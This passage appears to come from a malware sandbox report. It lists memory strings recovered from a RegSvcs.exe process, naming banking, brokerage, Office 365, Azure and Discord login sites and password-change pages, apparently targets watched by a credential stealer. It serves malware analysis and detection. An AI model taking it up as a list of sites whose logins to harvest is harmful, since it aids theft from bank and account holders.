Source: RegSvcs.exe, 00000002.00000002.4499585820.0000000003EC1000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: outlook.office365.comVMware20,11696428655t |
Source: RegSvcs.exe, 00000002.00000002.4499585820.0000000003EC1000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x |
Source: RegSvcs.exe, 00000002.00000002.4499585820.00000000041DF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Canara Transaction PasswordVMware20,11696428655x |
Source: RegSvcs.exe, 00000002.00000002.4499585820.0000000003EC1000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655 |
Source: RegSvcs.exe, 00000002.00000002.4499585820.0000000003EC1000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: outlook.office.comVMware20,11696428655s |
Source: RegSvcs.exe, 00000002.00000002.4499585820.00000000041DF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: discord.comVMware20,11696428655f |
Source: RegSvcs.exe, 00000002.00000002.4499585820.0000000003EC1000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~ |
Source: RegSvcs.exe, 00000002.00000002.4499585820.0000000003EC1000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: ms.portal.azure.comVMware20,11696428655 |
Source: RegSvcs.exe, 00000002.00000002.4499585820.00000000041DF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: outlook.office.comVMware20,11696428655s |
Source: RegSvcs.exe, 00000002.00000002.4499585820.0000000003EC1000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z |
Source: RegSvcs.exe, 00000002.00000002.4499585820.00000000041DF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: tasks.office.comVMware20,11696428655o |
Source: RegSvcs.exe, 00000002.00000002.4499585820.0000000003EC1000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: dev.azure.comVMware20,11696428655j |
Source: RegSvcs.exe, 00000002.00000002.4499585820.0000000003EC1000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: netportal.hdfcbank.comVMware20,11696428655 |
Source: RegSvcs.exe, 00000002.00000002.4499585820.00000000041DF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^ |
Source: RegSvcs.exe, 00000002.00000002.4499585820.00000000041DF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: AMC password management pageVMware20,11696428655 |
Source: RegSvcs.exe, 00000002.00000002.4499585820.00000000041DF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p |
Source: RegSvcs.exe, 00000002.00000002.4499585820.00000000041DF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655 |
Source: RegSvcs.exe, 00000002.00000002.4499585820.00000000041DF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: interactivebrokers.comVMware20,11696428655 |
Source: RegSvcs.exe, 00000002.00000002.4499585820.00000000041DF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~ |
Source: RegSvcs.exe, 00000002.00000002.4499585820.00000000041DF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h |
Source: RegSvcs.exe, 00000002.00000002.4499585820.00000000041DF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z |
Source: RegSvcs.exe, 00000002.00000002.4499585820.0000000003EC1000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h |
Source: RegSvcs.exe, 00000002.00000002.4499585820.00000000041DF000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: bankofamerica.comVMware20,11696428655x |